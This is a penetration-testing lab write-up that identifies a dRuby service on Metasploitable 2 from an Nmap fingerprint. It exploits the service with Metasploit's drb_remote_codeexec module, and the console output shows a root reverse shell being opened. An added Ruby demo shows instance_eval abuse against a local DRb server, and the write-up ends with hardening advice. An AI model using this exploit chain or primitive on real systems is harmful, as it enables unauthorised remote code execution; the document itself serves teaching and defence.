The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
8787/tcp open unknown
As we can see, this Nmap scan did not recognise the service on port 8787, so I ran a more aggressive version-detection scan against it (--version-all sends every probe Nmap has, not just the likely ones):
~# nmap -p 8787 -sV --version-all 192.168.1.103
Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-20 14:03 GMT
Nmap scan report for Unknown-00:0c:29:72:05:d6.home (192.168.1.103)
Host is up (0.081s latency).
PORT STATE SERVICE VERSION
8787/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port8787-TCP:V=6.25%I=9%D=11/20%Time=528CC14C%P=x86_64-unknown-linux-gn
SF:u%r(GenericLines,3AB,"\0\0\0\x03\x04\x08F\0\0\x03\xa0\x04\x08o:\x16DRb:
SF::DRbConnError\x07:\x07bt\[\x17\"//usr/lib/ruby/1\.8/drb/drb\.rb:573:in\
SF:x20`load'\"7/usr/lib/ruby/1\.8/drb/drb\.rb:612:in\x20`recv_request'\"7/
SF:usr/lib/ruby/1\.8/drb/drb\.rb:911:in\x20`recv_request'\"
The service is still unknown to Nmap, but the fingerprint itself is quite telling. Every field in a DRb message is a 4-byte big-endian length followed by a Ruby Marshal blob (the \x04\x08 bytes are the Marshal 4.8 version header). What came back is a reply pair: a 3-byte field holding false (the call failed) and a 928-byte field (\0\0\x03\xa0) holding a marshalled DRb::DRbConnError whose backtrace (the bt instance variable) runs through /usr/lib/ruby/1.8/drb/drb.rb in load and recv_request. In other words, a dRuby (DRb, Distributed Ruby) server on Ruby 1.8 tried to parse Nmap's probe as a DRb request and sent the resulting exception back to us. "drb" is the term to search for within Metasploit:
msf > search drb
[!] Database not connected or cache not built, using slow search
Matching Modules
================

   Name                                                   Disclosure Date  Rank       Description
   ----                                                   ---------------  ----       -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  Distributed Ruby Send instance_eval/syscall Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
The drb_remote_codeexec module is the obvious candidate (the two Wireshark modules target a different product entirely). Its name already describes how it works: it first tries to call instance_eval on the DRb front object and, if that fails, falls back to the syscall route, which writes the payload to a file on the target and executes it. We'll run with that:
msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(drb_remote_codeexec) > show options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   URI                    yes       The dRuby URI of the target host (druby://host:port)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(drb_remote_codeexec) > set URI "druby://192.168.1.103:8787"
URI => druby://192.168.1.103:8787
msf exploit(drb_remote_codeexec) > exploit

[*] Started reverse double handler
[*] trying to exploit instance_eval
[*] instance eval failed, trying to exploit syscall
[*] payload executed from file .EbA8isJbAjsgcmD8
[*] make sure to remove that file
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo en2vfxLYQpig5Eku;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "en2vfxLYQpig5Eku\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.70:4444 -> 192.168.1.103:47082) at 2013-11-20 16:26:55 +0000

whoami
root
And we have root. Two things are worth noting before moving on. The shell is root because the DRb service on Metasploitable 2 runs as root, so anything executed through it inherits that privilege. And the syscall path left a file behind (.EbA8isJbAjsgcmD8; the name is relative, so look in the DRb process's working directory), which the module itself tells you to remove.
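To make both halves of the above concrete (the wire format behind the Nmap fingerprint, and the instance_eval primitive the module abuses), here is an added example; it is not code from the original post, from Metasploitable 2 or from the Metasploit module. It starts two dRuby servers on loopback (ports picked by the OS), one with a plain front object and one with the reflective methods undefined, and drives them with a hand-rolled client that frames requests exactly as DRb does. The Calculator class, the "hunter2" secret and the method names it undefines are constructed for the demo; instead of a backtick command string it evaluates "@secret", which is the same primitive without running a shell.

```ruby
# Added example (not from the original post or the Metasploit module): a
# dRuby server and a minimal hand-rolled DRb client. Every DRb field on the
# wire is a 4-byte big-endian length followed by a Ruby Marshal 4.8 blob,
# the \x04\x08 seen in the Nmap fingerprint. Calculator, the secret and the
# loopback ports are constructed for the demo.
require 'drb/drb'
require 'socket'

# The server's "front" object: the only API its author meant to expose.
class Calculator
  def initialize(secret)
    @secret = secret # internal state, never part of the intended API
  end

  def add(a, b)
    a + b
  end
end

# Same API with the reflective entry points removed, so DRb's dispatch cannot
# route arbitrary Ruby through them. Defence in depth only (see note below).
class HardenedCalculator < Calculator
  %i[instance_eval instance_exec send public_send
     instance_variable_get instance_variable_set
     define_singleton_method singleton_class extend].each { |m| undef_method m }
end

# One DRb field: length prefix + Marshal dump.
def drb_frame(obj)
  body = Marshal.dump(obj)
  [body.bytesize].pack('N') + body
end

def drb_read(sock)
  len = sock.read(4).unpack('N').first
  Marshal.load(sock.read(len))
end

# A DRb request is [ref, method name, argc, args..., block]; a nil ref means
# "the server's front object". The reply is [success flag, result]: the same
# false + marshalled DRbConnError pair that Nmap captured on port 8787.
def drb_call(host, port, meth, *args)
  sock = TCPSocket.new(host, port)
  req = [drb_frame(nil), drb_frame(meth.to_s), drb_frame(args.length)]
  req.concat(args.map { |a| drb_frame(a) })
  req << drb_frame(nil) # no block
  sock.write(req.join)
  ok = drb_read(sock)
  result = drb_read(sock)
  [ok, result]
ensure
  sock.close if sock
end

def drb_port(uri)
  uri[/:(\d+)\z/, 1].to_i
end

# Legitimate call and instance_eval abuse against both servers. Metasploit's
# drb_remote_codeexec sends a backtick command string where this sends
# "@secret"; the primitive (arbitrary Ruby in the server process) is the same.
def run_demo
  vuln = DRb::DRbServer.new('druby://127.0.0.1:0', Calculator.new('hunter2'))
  hard = DRb::DRbServer.new('druby://127.0.0.1:0', HardenedCalculator.new('hunter2'))
  vport = drb_port(vuln.uri)
  hport = drb_port(hard.uri)
  {
    add:           drb_call('127.0.0.1', vport, :add, 2, 3),                # [true, 5]
    vuln_eval:     drb_call('127.0.0.1', vport, :instance_eval, '@secret'), # [true, "hunter2"]
    hardened_add:  drb_call('127.0.0.1', hport, :add, 2, 3),                # [true, 5]
    hardened_eval: drb_call('127.0.0.1', hport, :instance_eval, '@secret')  # [false, <exception>]
  }
ensure
  vuln.stop_service if vuln
  hard.stop_service if hard
end

if __FILE__ == $PROGRAM_NAME
  run_demo.each { |name, (ok, result)| puts "#{name}: ok=#{ok} result=#{result.inspect}" }
end
```

The undef_method list is only a partial fix: DRb resolves a non-nil ref through ObjectSpace._id2ref, so a caller who knows or guesses an object id is not confined to the front object at all. The control that actually matters is never exposing a DRb listener to untrusted peers, which means binding to loopback as above and adding an ACL (require 'drb/acl', then DRb.install_acl(ACL.new(%w[deny all allow 127.0.0.1]))) rather than the 0.0.0.0:8787 listener Metasploitable 2 ships with.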